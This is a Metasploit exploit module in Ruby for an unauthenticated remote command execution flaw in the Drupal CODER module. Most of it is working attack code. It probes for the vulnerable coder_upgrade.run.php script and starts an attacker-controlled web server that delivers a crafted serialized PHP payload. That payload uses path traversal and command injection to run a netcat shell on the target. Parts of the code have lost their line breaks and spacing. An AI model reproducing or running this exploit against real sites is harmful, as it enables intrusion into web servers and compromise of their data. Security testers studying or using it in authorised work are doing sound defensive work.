### This module requires Metasploit: http://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##classMetasploitModule<Msf::Exploit::RemoteRank=ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServerdefinitialize(info={})super(update_info(info,'Name'=>'Drupal CODER Module Remote Command Execution','Description'=>%q{
This module exploits a Remote Command Execution vulnerability in
Drupal CODER Module. Unauthenticated users can execute arbitrary command
under the context of the web server user.
CODER module doesn't sufficiently validate user inputs in a script file
that has the php extension. A malicious unauthenticated user can make
requests directly to this file to execute arbitrary command.
The module does not need to be enabled for this to be exploited
This module was tested against CODER 2.5 with Drupal 7.5 installation on Ubuntu server.
},'License'=>MSF_LICENSE,'Author'=>['Nicky Bloor',# discovery'Mehmet Ince <mehmet@mehmetince.net>'# msf module],'References'=>[['URL','https://www.drupal.org/node/2765575']],'Privileged'=>false,'Payload'=>{'Space'=>225,'DisableNops'=>true,'BadChars'=>"\x00\x2f",'Compat'=>{'PayloadType'=>'cmd','RequiredCmd'=>'netcat netcat-e'},},'Platform'=>['unix'],'Arch'=>ARCH_CMD,'Targets'=>[['Automatic',{}]],'DisclosureDate'=>'Jul 13 2016','DefaultTarget'=>0))register_options([OptString.new('TARGETURI',[true,'The target URI of the Drupal installation','/']),OptAddress.new('SRVHOST',[true,'Bogus web server host to receive request from target and deliver payload']),OptPort.new('SRVPORT',[true,'Bogus web server port to listen'])])enddef check
res =send_request_cgi('method'=>'GET','uri'=>normalize_uri(target_uri.path,'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),)if res && res.code ==200Exploit::CheckCode::AppearselseExploit::CheckCode::Safeendenddefon_request_uri(cli, _request)print_status("Incoming request detected...")
p =''
p <<'a:6:{s:5:"paths";a:3:{s:12:"modules_base";s:8:"../../..";s:10:"files_base";s:5:"../..";s:14:"libraries_base";s:5:"../..";}'
p <<'s:11:"theme_cache";s:16:"theme_cache_test";'
p <<'s:9:"variables";s:14:"variables_test";'
p <<'s:8:"upgrades";a:1:{i:0;a:2:{s:4:"path";s:2:"..";s:6:"module";s:3:"foo";}}'
p <<'s:10:"extensions";a:1:{s:3:"php";s:3:"php";}'
p <<'s:5:"items";a:1:{i:0;a:3:{s:7:"old_dir";s:12:"../../images";'
p <<'s:7:"new_dir";s:'
p <<(payload.encoded.length +14).to_s
p <<':"f --help && '
p << payload.encoded
p <<' #";s:4:"name";s:4:"test";}}}'print_status("Sending payload...")send_response(cli, p)enddef exploit
start_service
send_request_cgi('method'=>'GET','uri'=>normalize_uri(target_uri.path,'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),'encode_params'=>false,'vars_get'=>{'file'=> get_uri
})
stop_service
endend